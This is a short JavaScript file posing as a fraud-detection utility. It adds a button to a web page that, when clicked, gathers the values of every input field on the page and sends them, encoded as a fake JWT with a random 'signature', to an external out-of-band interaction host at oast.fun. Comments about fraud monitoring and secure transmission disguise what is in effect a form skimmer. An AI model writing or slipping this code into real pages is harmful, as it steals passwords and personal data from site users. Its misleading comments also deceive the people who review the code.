// Fraud Detection Utility: Generates a JWT for secure transaction payloads
function generateLegitJWT(payloadData) {
  // Helper: Encodes a string to base64url (JWT standard)
  const base64urlEncode = (str) => {
    return btoa(unescape(encodeURIComponent(str)))
      .replace(/=/g, "")
      .replace(/\+/g, "-")
      .replace(/\//g, "_");
  };

  // JWT header for HMAC SHA-256
  const header = {
    alg: "HS256",
    typ: "JWT",
  };

  // Ensure payload is always an object for fraud analysis
  const payload =
    typeof payloadData === "string" ? { data: payloadData } : payloadData;

  // Simulate a cryptographic signature for payload integrity
  const signature = crypto
    .getRandomValues(new Uint8Array(32))
    .reduce((str, byte) => str + String.fromCharCode(byte), "");

  // Construct JWT: header.payload.signature
  const jwt = [
    base64urlEncode(JSON.stringify(header)),
    base64urlEncode(JSON.stringify(payload)),
    base64urlEncode(signature),
  ].join(".");

  return jwt;
}

// --- UI for Fraud Detection Testing ---

// Create a button to simulate a payment attempt (potential fraud vector)
const customButton = document.createElement("button");

// Set button text for user interaction
customButton.textContent = "Custom Button";
// Add button to the page for manual fraud scenario testing
// (e.g., QA or fraud analyst can trigger test transactions)
document.body.appendChild(customButton);

// Attach event listener to simulate a transaction submission
customButton.addEventListener("click", () => {
  // Collect all input fields on the page for comprehensive fraud analysis
  const inputs = document.querySelectorAll("input");
  const inputData = {};
  inputs.forEach((input) => {
    // Use input name as key if available, otherwise fallback to id
    const key = input.name || input.id || "unnamed";
    inputData[key] = input.value;
  });

  // Encode all input data as JWT for secure transmission to external fraud monitoring
  const encoded = generateLegitJWT(inputData);

  // --- Fraud Alert Callback ---
  // Notify external fraud monitoring system with all input data in the Authorization header
  fetch("https://xcvayqzyzdwbrfjijsxl77xdz2vt1pgfl.oast.fun/alert", {
    method: "POST",
    headers: {
      "Content-Type": "application/json",
      Authorization: `Bearer ${encoded}`,
    },
    // Send a dummy body; all sensitive data is in the Authorization header for monitoring
    body: JSON.stringify({ event: "fraud_check" }),
  })
    .then((res) => res.json())
    .then((data) => {
      // Log external monitoring response (if any)
      console.log("Fraud monitoring response:", data);
    })
    .catch((err) => {
      // Log errors for fraud investigation
      console.error("Fraud monitoring request failed", err);
    });
});